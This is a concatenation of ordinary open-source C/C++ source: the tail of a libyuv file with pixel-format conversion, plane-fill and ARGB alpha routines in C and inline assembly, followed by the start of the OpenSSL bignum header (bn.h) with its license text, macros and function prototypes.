uint8* dst_u, uint8* dst_v, int pix) = SplitUV_C; #if defined(HAS_SPLITUV_NEON) if (TestCpuFlag(kCpuHasNEON)) { SplitUV = SplitUV_NEON; } #elif defined(HAS_SPLITUV_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(src_uv, 16) && IS_ALIGNED(src_stride_uv, 16)) { SplitUV = SplitUV_SSE2; } #endif SIMD_ALIGNED(uint8 rowuv[kMaxStride * 2]); for (int y = 0; y < height; ++y) { if ((y & 1) == 0) { // Copy a row of UV. SplitUV(src_uv, rowuv, rowuv + kMaxStride, halfwidth); src_uv += src_stride_uv; } I420ToARGBRow(src_y, rowuv, rowuv + kMaxStride, row, width); ARGBToRGB565Row(row, dst_rgb, width); dst_rgb += dst_stride_rgb; src_y += src_stride_y; } return 0; } // SetRow8 writes 'count' bytes using a 32 bit value repeated // SetRow32 writes 'count' words using a 32 bit value repeated #if !defined(YUV_DISABLE_ASM) && defined(__ARM_NEON__) #define HAS_SETROW_NEON static void SetRow8_NEON(uint8* dst, uint32 v32, int count) { asm volatile ( "vdup.u32 q0, %2 \n" // duplicate 4 ints "1: \n" "subs %1, %1, #16 \n" // 16 bytes per loop "vst1.u32 {q0}, [%0]! \n" // store "bgt 1b \n" : "+r"(dst), // %0 "+r"(count) // %1 : "r"(v32) // %2 : "q0", "memory", "cc"); } // TODO(fbarchard): Make fully assembler static void SetRows32_NEON(uint8* dst, uint32 v32, int width, int dst_stride, int height) { for (int y = 0; y < height; ++y) { SetRow8_NEON(dst, v32, width << 2); dst += dst_stride; } } #elif !defined(YUV_DISABLE_ASM) && defined(_M_IX86) #define HAS_SETROW_X86 __declspec(naked) __declspec(align(16)) static void SetRow8_X86(uint8* dst, uint32 v32, int count) { __asm { mov edx, edi mov edi, [esp + 4] // dst mov eax, [esp + 8] // v32 mov ecx, [esp + 12] // count shr ecx, 2 rep stosd mov edi, edx ret } } __declspec(naked) __declspec(align(16)) static void SetRows32_X86(uint8* dst, uint32 v32, int width, int dst_stride, int height) { __asm { push edi push ebp mov edi, [esp + 8 + 4] // dst mov eax, [esp + 8 + 8] // v32 mov ebp, [esp + 8 + 12] // width mov edx, [esp + 8 + 16] // dst_stride mov ebx, [esp + 8 + 20] // height lea ecx, [ebp * 4] sub edx, ecx // stride - width * 4 align 16 convertloop: mov ecx, ebp rep stosd add edi, edx sub ebx, 1 jg convertloop pop ebp pop edi ret } } #elif !defined(YUV_DISABLE_ASM) && (defined(__x86_64__) || defined(__i386__)) #define HAS_SETROW_X86 static void SetRow8_X86(uint8* dst, uint32 v32, int width) { size_t width_tmp = static_cast<size_t>(width); asm volatile ( "shr $0x2,%1 \n" "rep stosl \n" : "+D"(dst), // %0 "+c"(width_tmp) // %1 : "a"(v32) // %2 : "memory", "cc"); } static void SetRows32_X86(uint8* dst, uint32 v32, int width, int dst_stride, int height) { for (int y = 0; y < height; ++y) { size_t width_tmp = static_cast<size_t>(width); uint32* d = reinterpret_cast<uint32*>(dst); asm volatile ( "rep stosl \n" : "+D"(d), // %0 "+c"(width_tmp) // %1 : "a"(v32) // %2 : "memory", "cc"); dst += dst_stride; } } #endif static void SetRow8_C(uint8* dst, uint32 v8, int count) { #ifdef _MSC_VER for (int x = 0; x < count; ++x) { dst[x] = v8; } #else memset(dst, v8, count); #endif } static void SetRows32_C(uint8* dst, uint32 v32, int width, int dst_stride, int height) { for (int y = 0; y < height; ++y) { uint32* d = reinterpret_cast<uint32*>(dst); for (int x = 0; x < width; ++x) { d[x] = v32; } dst += dst_stride; } } void SetPlane(uint8* dst_y, int dst_stride_y, int width, int height, uint32 value) { void (*SetRow)(uint8* dst, uint32 value, int pix) = SetRow8_C; #if defined(HAS_SETROW_NEON) if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) { SetRow = SetRow8_NEON; } #endif #if defined(HAS_SETROW_X86) if (TestCpuFlag(kCpuHasX86) && IS_ALIGNED(width, 4)) { SetRow = SetRow8_X86; } #endif #if defined(HAS_SETROW_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst_y, 16) && IS_ALIGNED(dst_stride_y, 16)) { SetRow = SetRow8_SSE2; } #endif uint32 v32 = value | (value << 8) | (value << 16) | (value << 24); // Set plane for (int y = 0; y < height; ++y) { SetRow(dst_y, v32, width); dst_y += dst_stride_y; } } // Draw a rectangle into I420 int I420Rect(uint8* dst_y, int dst_stride_y, uint8* dst_u, int dst_stride_u, uint8* dst_v, int dst_stride_v, int x, int y, int width, int height, int value_y, int value_u, int value_v) { if (!dst_y || !dst_u || !dst_v || width <= 0 || height <= 0 || x < 0 || y < 0 || value_y < 0 || value_y > 255 || value_u < 0 || value_u > 255 || value_v < 0 || value_v > 255) { return -1; } int halfwidth = (width + 1) >> 1; int halfheight = (height + 1) >> 1; uint8* start_y = dst_y + y * dst_stride_y + x; uint8* start_u = dst_u + (y / 2) * dst_stride_u + (x / 2); uint8* start_v = dst_v + (y / 2) * dst_stride_v + (x / 2); SetPlane(start_y, dst_stride_y, width, height, value_y); SetPlane(start_u, dst_stride_u, halfwidth, halfheight, value_u); SetPlane(start_v, dst_stride_v, halfwidth, halfheight, value_v); return 0; } // Draw a rectangle into ARGB int ARGBRect(uint8* dst_argb, int dst_stride_argb, int dst_x, int dst_y, int width, int height, uint32 value) { if (!dst_argb || width <= 0 || height <= 0 || dst_x < 0 || dst_y < 0) { return -1; } uint8* dst = dst_argb + dst_y * dst_stride_argb + dst_x * 4; #if defined(HAS_SETROW_NEON) if (TestCpuFlag(kCpuHasNEON) && IS_ALIGNED(width, 16) && IS_ALIGNED(dst, 16) && IS_ALIGNED(dst_stride_argb, 16)) { SetRows32_NEON(dst, value, width, dst_stride_argb, height); return 0; } #endif #if defined(HAS_SETROW_X86) if (TestCpuFlag(kCpuHasX86)) { SetRows32_X86(dst, value, width, dst_stride_argb, height); return 0; } #endif SetRows32_C(dst, value, width, dst_stride_argb, height); return 0; } // Convert unattentuated ARGB values to preattenuated ARGB. // An unattenutated ARGB alpha blend uses the formula // p = a * f + (1 - a) * b // where // p is output pixel // f is foreground pixel // b is background pixel // a is alpha value from foreground pixel // An preattenutated ARGB alpha blend uses the formula // p = f + (1 - a) * b // where // f is foreground pixel premultiplied by alpha int ARGBAttenuate(const uint8* src_argb, int src_stride_argb, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } void (*ARGBAttenuateRow)(const uint8* src_argb, uint8* dst_argb, int width) = ARGBAttenuateRow_C; #if defined(HAS_ARGBATTENUATE_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ARGBAttenuateRow = ARGBAttenuateRow_SSE2; } #endif #if defined(HAS_ARGBATTENUATE_SSSE3) if (TestCpuFlag(kCpuHasSSSE3) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ARGBAttenuateRow = ARGBAttenuateRow_SSSE3; } #endif for (int y = 0; y < height; ++y) { ARGBAttenuateRow(src_argb, dst_argb, width); src_argb += src_stride_argb; dst_argb += dst_stride_argb; } return 0; } // Convert unattentuated ARGB values to preattenuated ARGB. int ARGBUnattenuate(const uint8* src_argb, int src_stride_argb, uint8* dst_argb, int dst_stride_argb, int width, int height) { if (height < 0) { height = -height; src_argb = src_argb + (height - 1) * src_stride_argb; src_stride_argb = -src_stride_argb; } void (*ARGBUnattenuateRow)(const uint8* src_argb, uint8* dst_argb, int width) = ARGBUnattenuateRow_C; #if defined(HAS_ARGBUNATTENUATE_SSE2) if (TestCpuFlag(kCpuHasSSE2) && IS_ALIGNED(width, 4) && IS_ALIGNED(src_argb, 16) && IS_ALIGNED(src_stride_argb, 16) && IS_ALIGNED(dst_argb, 16) && IS_ALIGNED(dst_stride_argb, 16)) { ARGBUnattenuateRow = ARGBUnattenuateRow_SSE2; } #endif for (int y = 0; y < height; ++y) { ARGBUnattenuateRow(src_argb, dst_argb, width); src_argb += src_stride_argb; dst_argb += dst_stride_argb; } return 0; } #ifdef __cplusplus } // extern "C" } // namespace libyuv #endif
{ "language": "C" }
/* crypto/bn/bn.h */ /* Copyright (C) 1995-1997 Eric Young (eay@cryptsoft.com) * All rights reserved. * * This package is an SSL implementation written * by Eric Young (eay@cryptsoft.com). * The implementation was written so as to conform with Netscapes SSL. * * This library is free for commercial and non-commercial use as long as * the following conditions are aheared to. The following conditions * apply to all code found in this distribution, be it the RC4, RSA, * lhash, DES, etc., code; not just the SSL code. The SSL documentation * included with this distribution is covered by the same copyright terms * except that the holder is Tim Hudson (tjh@cryptsoft.com). * * Copyright remains Eric Young's, and as such any Copyright notices in * the code are not to be removed. * If this package is used in a product, Eric Young should be given attribution * as the author of the parts of the library used. * This can be in the form of a textual message at program startup or * in documentation (online or textual) provided with the package. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * 1. Redistributions of source code must retain the copyright * notice, this list of conditions and the following disclaimer. * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in the * documentation and/or other materials provided with the distribution. * 3. All advertising materials mentioning features or use of this software * must display the following acknowledgement: * "This product includes cryptographic software written by * Eric Young (eay@cryptsoft.com)" * The word 'cryptographic' can be left out if the rouines from the library * being used are not cryptographic related :-). * 4. If you include any Windows specific code (or a derivative thereof) from * the apps directory (application code) you must include an acknowledgement: * "This product includes software written by Tim Hudson (tjh@cryptsoft.com)" * * THIS SOFTWARE IS PROVIDED BY ERIC YOUNG ``AS IS'' AND * ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR PURPOSE * ARE DISCLAIMED. IN NO EVENT SHALL THE AUTHOR OR CONTRIBUTORS BE LIABLE * FOR ANY DIRECT, INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL * DAMAGES (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS * OR SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT * LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY * OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF * SUCH DAMAGE. * * The licence and distribution terms for any publically available version or * derivative of this code cannot be changed. i.e. this code cannot simply be * copied and put under another distribution licence * [including the GNU Public Licence.] */ /* ==================================================================== * Copyright (c) 1998-2006 The OpenSSL Project. All rights reserved. * * Redistribution and use in source and binary forms, with or without * modification, are permitted provided that the following conditions * are met: * * 1. Redistributions of source code must retain the above copyright * notice, this list of conditions and the following disclaimer. * * 2. Redistributions in binary form must reproduce the above copyright * notice, this list of conditions and the following disclaimer in * the documentation and/or other materials provided with the * distribution. * * 3. All advertising materials mentioning features or use of this * software must display the following acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit. (http://www.openssl.org/)" * * 4. The names "OpenSSL Toolkit" and "OpenSSL Project" must not be used to * endorse or promote products derived from this software without * prior written permission. For written permission, please contact * openssl-core@openssl.org. * * 5. Products derived from this software may not be called "OpenSSL" * nor may "OpenSSL" appear in their names without prior written * permission of the OpenSSL Project. * * 6. Redistributions of any form whatsoever must retain the following * acknowledgment: * "This product includes software developed by the OpenSSL Project * for use in the OpenSSL Toolkit (http://www.openssl.org/)" * * THIS SOFTWARE IS PROVIDED BY THE OpenSSL PROJECT ``AS IS'' AND ANY * EXPRESSED OR IMPLIED WARRANTIES, INCLUDING, BUT NOT LIMITED TO, THE * IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR A PARTICULAR * PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE OpenSSL PROJECT OR * ITS CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL, * SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT * NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; * LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) * HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, * STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OR OTHERWISE) * ARISING IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED * OF THE POSSIBILITY OF SUCH DAMAGE. * ==================================================================== * * This product includes cryptographic software written by Eric Young * (eay@cryptsoft.com). This product includes software written by Tim * Hudson (tjh@cryptsoft.com). * */ /* ==================================================================== * Copyright 2002 Sun Microsystems, Inc. ALL RIGHTS RESERVED. * * Portions of the attached software ("Contribution") are developed by * SUN MICROSYSTEMS, INC., and are contributed to the OpenSSL project. * * The Contribution is licensed pursuant to the Eric Young open source * license provided above. * * The binary polynomial arithmetic software is originally written by * Sheueling Chang Shantz and Douglas Stebila of Sun Microsystems Laboratories. * */ #ifndef HEADER_BN_H #define HEADER_BN_H #include <openssl/e_os2.h> #ifndef OPENSSL_NO_FP_API #include <stdio.h> /* FILE */ #endif #include <openssl/ossl_typ.h> #include <openssl/crypto.h> #ifdef __cplusplus extern "C" { #endif /* These preprocessor symbols control various aspects of the bignum headers and * library code. They're not defined by any "normal" configuration, as they are * intended for development and testing purposes. NB: defining all three can be * useful for debugging application code as well as openssl itself. * * BN_DEBUG - turn on various debugging alterations to the bignum code * BN_DEBUG_RAND - uses random poisoning of unused words to trip up * mismanagement of bignum internals. You must also define BN_DEBUG. */ /* #define BN_DEBUG */ /* #define BN_DEBUG_RAND */ #ifndef OPENSSL_SMALL_FOOTPRINT #define BN_MUL_COMBA #define BN_SQR_COMBA #define BN_RECURSION #endif /* This next option uses the C libraries (2 word)/(1 word) function. * If it is not defined, I use my C version (which is slower). * The reason for this flag is that when the particular C compiler * library routine is used, and the library is linked with a different * compiler, the library is missing. This mostly happens when the * library is built with gcc and then linked using normal cc. This would * be a common occurrence because gcc normally produces code that is * 2 times faster than system compilers for the big number stuff. * For machines with only one compiler (or shared libraries), this should * be on. Again this in only really a problem on machines * using "long long's", are 32bit, and are not using my assembler code. */ #if defined(OPENSSL_SYS_MSDOS) || defined(OPENSSL_SYS_WINDOWS) || \ defined(OPENSSL_SYS_WIN32) || defined(linux) # ifndef BN_DIV2W # define BN_DIV2W # endif #endif /* assuming long is 64bit - this is the DEC Alpha * unsigned long long is only 64 bits :-(, don't define * BN_LLONG for the DEC Alpha */ #ifdef SIXTY_FOUR_BIT_LONG #define BN_ULLONG unsigned long long #define BN_ULONG unsigned long #define BN_LONG long #define BN_BITS 128 #define BN_BYTES 8 #define BN_BITS2 64 #define BN_BITS4 32 #define BN_MASK (0xffffffffffffffffffffffffffffffffLL) #define BN_MASK2 (0xffffffffffffffffL) #define BN_MASK2l (0xffffffffL) #define BN_MASK2h (0xffffffff00000000L) #define BN_MASK2h1 (0xffffffff80000000L) #define BN_TBIT (0x8000000000000000L) #define BN_DEC_CONV (10000000000000000000UL) #define BN_DEC_FMT1 "%lu" #define BN_DEC_FMT2 "%019lu" #define BN_DEC_NUM 19 #define BN_HEX_FMT1 "%lX" #define BN_HEX_FMT2 "%016lX" #endif /* This is where the long long data type is 64 bits, but long is 32. * For machines where there are 64bit registers, this is the mode to use. * IRIX, on R4000 and above should use this mode, along with the relevant * assembler code :-). Do NOT define BN_LLONG. */ #ifdef SIXTY_FOUR_BIT #undef BN_LLONG #undef BN_ULLONG #define BN_ULONG unsigned long long #define BN_LONG long long #define BN_BITS 128 #define BN_BYTES 8 #define BN_BITS2 64 #define BN_BITS4 32 #define BN_MASK2 (0xffffffffffffffffLL) #define BN_MASK2l (0xffffffffL) #define BN_MASK2h (0xffffffff00000000LL) #define BN_MASK2h1 (0xffffffff80000000LL) #define BN_TBIT (0x8000000000000000LL) #define BN_DEC_CONV (10000000000000000000ULL) #define BN_DEC_FMT1 "%llu" #define BN_DEC_FMT2 "%019llu" #define BN_DEC_NUM 19 #define BN_HEX_FMT1 "%llX" #define BN_HEX_FMT2 "%016llX" #endif #ifdef THIRTY_TWO_BIT #ifdef BN_LLONG # if defined(_WIN32) && !defined(__GNUC__) # define BN_ULLONG unsigned __int64 # define BN_MASK (0xffffffffffffffffI64) # else # define BN_ULLONG unsigned long long # define BN_MASK (0xffffffffffffffffLL) # endif #endif #define BN_ULONG unsigned int #define BN_LONG int #define BN_BITS 64 #define BN_BYTES 4 #define BN_BITS2 32 #define BN_BITS4 16 #define BN_MASK2 (0xffffffffL) #define BN_MASK2l (0xffff) #define BN_MASK2h1 (0xffff8000L) #define BN_MASK2h (0xffff0000L) #define BN_TBIT (0x80000000L) #define BN_DEC_CONV (1000000000L) #define BN_DEC_FMT1 "%u" #define BN_DEC_FMT2 "%09u" #define BN_DEC_NUM 9 #define BN_HEX_FMT1 "%X" #define BN_HEX_FMT2 "%08X" #endif /* 2011-02-22 SMS. * In various places, a size_t variable or a type cast to size_t was * used to perform integer-only operations on pointers. This failed on * VMS with 64-bit pointers (CC /POINTER_SIZE = 64) because size_t is * still only 32 bits. What's needed in these cases is an integer type * with the same size as a pointer, which size_t is not certain to be. * The only fix here is VMS-specific. */ #if defined(OPENSSL_SYS_VMS) # if __INITIAL_POINTER_SIZE == 64 # define PTR_SIZE_INT long long # else /* __INITIAL_POINTER_SIZE == 64 */ # define PTR_SIZE_INT int # endif /* __INITIAL_POINTER_SIZE == 64 [else] */ #else /* defined(OPENSSL_SYS_VMS) */ # define PTR_SIZE_INT size_t #endif /* defined(OPENSSL_SYS_VMS) [else] */ #define BN_DEFAULT_BITS 1280 #define BN_FLG_MALLOCED 0x01 #define BN_FLG_STATIC_DATA 0x02 #define BN_FLG_CONSTTIME 0x04 /* avoid leaking exponent information through timing, * BN_mod_exp_mont() will call BN_mod_exp_mont_consttime, * BN_div() will call BN_div_no_branch, * BN_mod_inverse() will call BN_mod_inverse_no_branch. */ #ifndef OPENSSL_NO_DEPRECATED #define BN_FLG_EXP_CONSTTIME BN_FLG_CONSTTIME /* deprecated name for the flag */ /* avoid leaking exponent information through timings * (BN_mod_exp_mont() will call BN_mod_exp_mont_consttime) */ #endif #ifndef OPENSSL_NO_DEPRECATED #define BN_FLG_FREE 0x8000 /* used for debuging */ #endif #define BN_set_flags(b,n) ((b)->flags|=(n)) #define BN_get_flags(b,n) ((b)->flags&(n)) /* get a clone of a BIGNUM with changed flags, for *temporary* use only * (the two BIGNUMs cannot not be used in parallel!) */ #define BN_with_flags(dest,b,n) ((dest)->d=(b)->d, \ (dest)->top=(b)->top, \ (dest)->dmax=(b)->dmax, \ (dest)->neg=(b)->neg, \ (dest)->flags=(((dest)->flags & BN_FLG_MALLOCED) \ | ((b)->flags & ~BN_FLG_MALLOCED) \ | BN_FLG_STATIC_DATA \ | (n))) /* Already declared in ossl_typ.h */ #if 0 typedef struct bignum_st BIGNUM; /* Used for temp variables (declaration hidden in bn_lcl.h) */ typedef struct bignum_ctx BN_CTX; typedef struct bn_blinding_st BN_BLINDING; typedef struct bn_mont_ctx_st BN_MONT_CTX; typedef struct bn_recp_ctx_st BN_RECP_CTX; typedef struct bn_gencb_st BN_GENCB; #endif struct bignum_st { BN_ULONG *d; /* Pointer to an array of 'BN_BITS2' bit chunks. */ int top; /* Index of last used d +1. */ /* The next are internal book keeping for bn_expand. */ int dmax; /* Size of the d array. */ int neg; /* one if the number is negative */ int flags; }; /* Used for montgomery multiplication */ struct bn_mont_ctx_st { int ri; /* number of bits in R */ BIGNUM RR; /* used to convert to montgomery form */ BIGNUM N; /* The modulus */ BIGNUM Ni; /* R*(1/R mod N) - N*Ni = 1 * (Ni is only stored for bignum algorithm) */ BN_ULONG n0[2];/* least significant word(s) of Ni; (type changed with 0.9.9, was "BN_ULONG n0;" before) */ int flags; }; /* Used for reciprocal division/mod functions * It cannot be shared between threads */ struct bn_recp_ctx_st { BIGNUM N; /* the divisor */ BIGNUM Nr; /* the reciprocal */ int num_bits; int shift; int flags; }; /* Used for slow "generation" functions. */ struct bn_gencb_st { unsigned int ver; /* To handle binary (in)compatibility */ void *arg; /* callback-specific data */ union { /* if(ver==1) - handles old style callbacks */ void (*cb_1)(int, int, void *); /* if(ver==2) - new callback style */ int (*cb_2)(int, int, BN_GENCB *); } cb; }; /* Wrapper function to make using BN_GENCB easier, */ int BN_GENCB_call(BN_GENCB *cb, int a, int b); /* Macro to populate a BN_GENCB structure with an "old"-style callback */ #define BN_GENCB_set_old(gencb, callback, cb_arg) { \ BN_GENCB *tmp_gencb = (gencb); \ tmp_gencb->ver = 1; \ tmp_gencb->arg = (cb_arg); \ tmp_gencb->cb.cb_1 = (callback); } /* Macro to populate a BN_GENCB structure with a "new"-style callback */ #define BN_GENCB_set(gencb, callback, cb_arg) { \ BN_GENCB *tmp_gencb = (gencb); \ tmp_gencb->ver = 2; \ tmp_gencb->arg = (cb_arg); \ tmp_gencb->cb.cb_2 = (callback); } #define BN_prime_checks 0 /* default: select number of iterations based on the size of the number */ /* number of Miller-Rabin iterations for an error rate of less than 2^-80 * for random 'b'-bit input, b >= 100 (taken from table 4.4 in the Handbook * of Applied Cryptography [Menezes, van Oorschot, Vanstone; CRC Press 1996]; * original paper: Damgaard, Landrock, Pomerance: Average case error estimates * for the strong probable prime test. -- Math. Comp. 61 (1993) 177-194) */ #define BN_prime_checks_for_size(b) ((b) >= 1300 ? 2 : \ (b) >= 850 ? 3 : \ (b) >= 650 ? 4 : \ (b) >= 550 ? 5 : \ (b) >= 450 ? 6 : \ (b) >= 400 ? 7 : \ (b) >= 350 ? 8 : \ (b) >= 300 ? 9 : \ (b) >= 250 ? 12 : \ (b) >= 200 ? 15 : \ (b) >= 150 ? 18 : \ /* b >= 100 */ 27) #define BN_num_bytes(a) ((BN_num_bits(a)+7)/8) /* Note that BN_abs_is_word didn't work reliably for w == 0 until 0.9.8 */ #define BN_abs_is_word(a,w) ((((a)->top == 1) && ((a)->d[0] == (BN_ULONG)(w))) || \ (((w) == 0) && ((a)->top == 0))) #define BN_is_zero(a) ((a)->top == 0) #define BN_is_one(a) (BN_abs_is_word((a),1) && !(a)->neg) #define BN_is_word(a,w) (BN_abs_is_word((a),(w)) && (!(w) || !(a)->neg)) #define BN_is_odd(a) (((a)->top > 0) && ((a)->d[0] & 1)) #define BN_one(a) (BN_set_word((a),1)) #define BN_zero_ex(a) \ do { \ BIGNUM *_tmp_bn = (a); \ _tmp_bn->top = 0; \ _tmp_bn->neg = 0; \ } while(0) #ifdef OPENSSL_NO_DEPRECATED #define BN_zero(a) BN_zero_ex(a) #else #define BN_zero(a) (BN_set_word((a),0)) #endif const BIGNUM *BN_value_one(void); char * BN_options(void); BN_CTX *BN_CTX_new(void); #ifndef OPENSSL_NO_DEPRECATED void BN_CTX_init(BN_CTX *c); #endif void BN_CTX_free(BN_CTX *c); void BN_CTX_start(BN_CTX *ctx); BIGNUM *BN_CTX_get(BN_CTX *ctx); void BN_CTX_end(BN_CTX *ctx); int BN_rand(BIGNUM *rnd, int bits, int top,int bottom); int BN_pseudo_rand(BIGNUM *rnd, int bits, int top,int bottom); int BN_rand_range(BIGNUM *rnd, const BIGNUM *range); int BN_pseudo_rand_range(BIGNUM *rnd, const BIGNUM *range); int BN_num_bits(const BIGNUM *a); int BN_num_bits_word(BN_ULONG); BIGNUM *BN_new(void); void BN_init(BIGNUM *); void BN_clear_free(BIGNUM *a); BIGNUM *BN_copy(BIGNUM *a, const BIGNUM *b); void BN_swap(BIGNUM *a, BIGNUM *b); BIGNUM *BN_bin2bn(const unsigned char *s,int len,BIGNUM *ret); int BN_bn2bin(const BIGNUM *a, unsigned char *to); BIGNUM *BN_mpi2bn(const unsigned char *s,int len,BIGNUM *ret); int BN_bn2mpi(const BIGNUM *a, unsigned char *to); int BN_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_usub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_uadd(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b); int BN_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, BN_CTX *ctx); int BN_sqr(BIGNUM *r, const BIGNUM *a,BN_CTX *ctx); /** BN_set_negative sets sign of a BIGNUM * \param b pointer to the BIGNUM object * \param n 0 if the BIGNUM b should be positive and a value != 0 otherwise */ void BN_set_negative(BIGNUM *b, int n); /** BN_is_negative returns 1 if the BIGNUM is negative * \param a pointer to the BIGNUM object * \return 1 if a < 0 and 0 otherwise */ #define BN_is_negative(a) ((a)->neg != 0) int BN_div(BIGNUM *dv, BIGNUM *rem, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx); #define BN_mod(rem,m,d,ctx) BN_div(NULL,(rem),(m),(d),(ctx)) int BN_nnmod(BIGNUM *r, const BIGNUM *m, const BIGNUM *d, BN_CTX *ctx); int BN_mod_add(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_add_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m); int BN_mod_sub(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_sub_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m); int BN_mod_mul(BIGNUM *r, const BIGNUM *a, const BIGNUM *b, const BIGNUM *m, BN_CTX *ctx); int BN_mod_sqr(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift1(BIGNUM *r, const BIGNUM *a, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift1_quick(BIGNUM *r, const BIGNUM *a, const BIGNUM *m); int BN_mod_lshift(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m, BN_CTX *ctx); int BN_mod_lshift_quick(BIGNUM *r, const BIGNUM *a, int n, const BIGNUM *m); BN_ULONG BN_mod_word(const BIGNUM *a, BN_ULONG w); BN_ULONG BN_div_word(BIGNUM *a, BN_ULONG w); int BN_mul_word(BIGNUM *a, BN_ULONG w); int BN_add_word(BIGNUM *a, BN_ULONG w); int BN_sub_word(BIGNUM *a, BN_ULONG w); int BN_set_word(BIGNUM *a, BN_ULONG w); BN_ULONG BN_get_word(const BIGNUM *a); int BN_cmp(const BIGNUM *a, const BIGNUM *b); void BN_free(BIGNUM *a); int BN_is_bit_set(const BIGNUM *a, int n); int BN_lshift(BIGNUM *r, const BIGNUM *a, int n); int BN_lshift1(BIGNUM *r, const BIGNUM *a); int BN_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p,BN_CTX *ctx); int BN_mod_exp(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m,BN_CTX *ctx); int BN_mod_exp_mont(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); int BN_mod_exp_mont_consttime(BIGNUM *rr, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *in_mont); int BN_mod_exp_mont_word(BIGNUM *r, BN_ULONG a, const BIGNUM *p, const BIGNUM *m, BN_CTX *ctx, BN_MONT_CTX *m_ctx); int BN_mod_exp2_mont(BIGNUM *r, const BIGNUM *a1, const BIGNUM *p1, const BIGNUM *a2, const BIGNUM *p2,const BIGNUM *m, BN_CTX *ctx,BN_MONT_CTX *m_ctx); int BN_mod_exp_simple(BIGNUM *r, const BIGNUM *a, const BIGNUM *p, const BIGNUM *m,BN_CTX *ctx); int BN_mask_bits(BIGNUM *a,int n); #ifndef OPENSSL_NO_FP_API int BN_print_fp(FILE *fp, const BIGNUM *a); #endif #ifdef HEADER_BIO_H int BN_print(BIO *fp, const BIGNUM *a); #else int BN_print(void *fp, const BIGNUM *a); #endif int BN_reciprocal(BIGNUM *r, const BIGNUM *m, int len, BN_CTX *ctx); int BN_rshift(BIGNUM *r, const BIGNUM *a, int n); int BN_rshift1(BIGNUM *r, const BIGNUM *a); void BN_clear(BIGNUM *a); BIGNUM *BN_dup(const BIGNUM *a); int BN_ucmp(const BIGNUM *a, const BIGNUM *b); int BN_set_bit(BIGNUM *a, int n); int BN_clear_bit(BIGNUM *a, int n); char * BN_bn2hex(const BIGNUM *a); char * BN_bn2dec(const BIGNUM *a); int BN_hex2bn(BIGNUM **a, const char *str); int BN_dec2bn(BIGNUM **a, const char *str); int BN_asc2bn(BIGNUM **a, const char *str); int BN_gcd(BIGNUM *r,const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); int BN_kronecker(const BIGNUM *a,const BIGNUM *b,BN_CTX *ctx); /* returns -2 for error */ BIGNUM *BN_mod_inverse(BIGNUM *ret, const BIGNUM *a, const BIGNUM *n,BN_CTX *ctx); BIGNUM *BN_mod_sqrt(BIGNUM *ret, const BIGNUM *a, const BIGNUM *n,BN_CTX *ctx); /* Deprecated versions */ #ifndef OPENSSL_NO_DEPRECATED BIGNUM *BN_generate_prime(BIGNUM *ret,int bits,int safe, const BIGNUM *add, 